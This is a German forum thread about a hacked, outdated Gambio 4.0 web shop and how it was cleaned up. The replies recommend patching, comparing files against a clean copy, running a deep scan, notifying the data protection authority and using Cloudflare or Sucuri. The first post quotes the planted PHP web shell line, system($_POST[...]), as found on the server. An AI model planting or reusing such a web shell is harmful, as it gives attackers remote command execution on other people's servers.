Hallo beisammen, ein neuer Kunde hatte als einziges in einem 4.0 Shop den Sicherheitspatch 2024-02 nicht installiert. Heute informierte ihn der Hoster über Viren auf dem Server. Symptomatik: einige kryptisch benannte php Dateien mit folgendem Code im Root: [{"Expires":1,"Discard":false,"Value":"<?php system($_POST['XXXXXXX']);?>","Path":"\/","Name":"XXXXXXX.XXX","Domain":"XXXXX","Secure":false,"Httponly":false,"Max-Age":3}] ab genau dem Erstellungsdatum der ersten Datei einige kryptische Gastkundenaccounts Wir haben: kompletten Shop offline gesetzt alle versuchten dateien seit dem ersten hack gelöscht zip aller dateien erstellt, heruntergeladen und mit 3 virenscannern lokal gescanned. keine weiteren treffer sicherheitspatch 2024-02 installiert - war der die ursache? der patch und hack sind leider nirgends dokumentiert alle passwörter serveradmin, ftp, db geändert caches geleert logfiles gelöscht shop wieder online gesetzt Der Shop sollte jetzt nach bestem Wissen wieder sauber und sicher sein. Was meint Ihr? Generell ist ein Abfluss von Kundendaten möglich wenn solch ein Hack erfolgte?
4.0 ist so alt, dass es auch an Dingen gelegen haben kann, die während des normale Updatezyklus geschlossen wurden. Muss nichtmal an Gambio liegen. Lokale Virenscanner können was finden, finden aber in den meisten Fällen nichts. Empfehle hier eher den Hoster anzuschreiben und einen entsprechenden Tiefenscan machen zu lassen. Ein Shop mit Version 4.0 ist in keinem Fall sicher. 4 Jahre sind Äonen. Und natürlich ist ein Abfluss von Kundendaten möglich. Genau dann wenn Zugriff zur Datenbank bestand. Leider gibts für Gambio keine WAF von der Stange. Wäre mal ein interessantes Projekt. Einzige Möglichkeit die ich spontan kenne wäre Cloudflare.
Guten Morgen zusammen, Du schreibst: Wir habt ihr diese Dateien identifiziert? Wie habt ihr festgestellt ob es nicht zusätzliche neu angelegte Dateien gab? Wurde das per Dateivergleich gelöst? Wenn die Annahme stimmt dass der fehlende Security-Patch die Ursache war könntet ihr Glück haben. Wenn es aber unentdeckte Lücken in der veralteten Shopversion gibt wird es evtl. erneut zu Problemen kommen. Nicht vergessen: Bei der Datenschutzbehörde melden und Kunden verständigen! Grüße Walter
wir haben alles runtergeladen. lokal mit 3 scannern gecheckt. auf server alle dateien mit änderungsdatum ab x gecheckt. alle wenigen betroffenen dateien gesäuert. provider liess einen weiteren virencheck drüber laufen. alles sauber. kundendaten haben wir in dem shop eh keine, dient rein info. das einzige was mich interessieren würde: sec patch 2024 dichtet dann wohl sehr sicher eine lücke ab die via gastkonten > rechteausweitung stattfindet? wir hattene einige kryptische gäste drin.
Hallo, danke für Deine Erklärung. Ich denke so besteht schon mal eine gute Gewissheit das alles erwischt wurde. Ich persönlich würde zusätzlich einen Dateivergleich mit einer sauberen Version machen. Grüße Walter
Hallo Du kannst den Webspace noch mit Sucuri überprüfen und überwachen. https://sucuri.net/website-security-platform/signup/ Cloudflare ist ohnehin immer zu empfehlen für Performance und Sicherheit. Beste Grüsse